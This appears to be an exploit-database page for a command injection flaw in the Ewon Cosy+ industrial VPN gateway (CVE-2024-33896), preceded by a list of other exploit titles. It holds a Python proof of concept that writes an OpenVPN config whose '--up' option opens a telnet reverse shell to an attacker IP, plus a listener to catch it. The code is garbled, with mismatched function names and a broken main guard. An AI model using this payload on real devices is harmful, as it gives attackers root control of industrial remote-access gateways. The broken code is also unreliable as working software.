9d3e200bec
12 changes to exploits/shellcodes/ghdb Cosy+ firmware 21.2s7 - Command Injection K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover AquilaCMS 1.409.20 - Remote Command Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) Feng Office 3.11.1.2 - SQL Injection flatCore 1.5.5 - Arbitrary File Upload PandoraFMS 7.0NG.772 - SQL Injection Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
53 lines
No EOL
2.2 KiB
Python
Executable file
53 lines
No EOL
2.2 KiB
Python
Executable file
Hey,
|
|
|
|
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
|
|
maintenance in industrial environments. The manufacturer describes the
|
|
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
|
|
VPN connection between the machine (PLC, HMI, or other devices) and the
|
|
remote engineer. The connection happens through Talk2m, a highly secured
|
|
industrial cloud service. The Ewon Cosy+ makes industrial remote access
|
|
easy and secure like never before!" Due to improper neutralization of
|
|
parameters read from a user-controlled configuration file, an authenticated
|
|
attacker is able to inject and execute OS commands on the device.
|
|
|
|
Vulnerability Details: Authenticated attackers are able to upload a custom
|
|
OpenVPN configuration. This configuration can contain the OpenVPN
|
|
paramaters "--up" and "--down", which execute a specified script or
|
|
executable. Since the process itself runs with the highest privileges
|
|
(root), this allows the device to be completely compromised.
|
|
|
|
|
|
PoC:
|
|
# Exploit Title: Ewon Cosy+ Command Injection
|
|
# Google Dork: N/A
|
|
# Date: 2024-8-20
|
|
# Exploit Author: CodeB0ss
|
|
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
|
|
# Version: 21.2s7
|
|
# Tested on: Windows 11 Home Edition
|
|
# CVE: CVE-2024-33896
|
|
|
|
|
|
import socket
|
|
import subprocess
|
|
import time
|
|
|
|
def configcreator(file_path):
|
|
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
|
|
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
|
|
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
|
|
l3st(port): server_socket = socket.socket(socket.AF_INET,
|
|
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
|
|
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
|
|
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
|
|
True: data = client_socket.recv(1024) if not data: break
|
|
print(data.decode()) client_socket.close() server_socket.close() if name ==
|
|
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
|
|
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
|
|
import start_listener; start_listener({port})']) time.sleep(2)
|
|
create_malicious_openvpn_config(config) print(f" - --> config_created
|
|
{config}")
|
|
|
|
|
|
GitHub:
|
|
https://github.com/codeb0ss/CVE-2024-33896-PoC |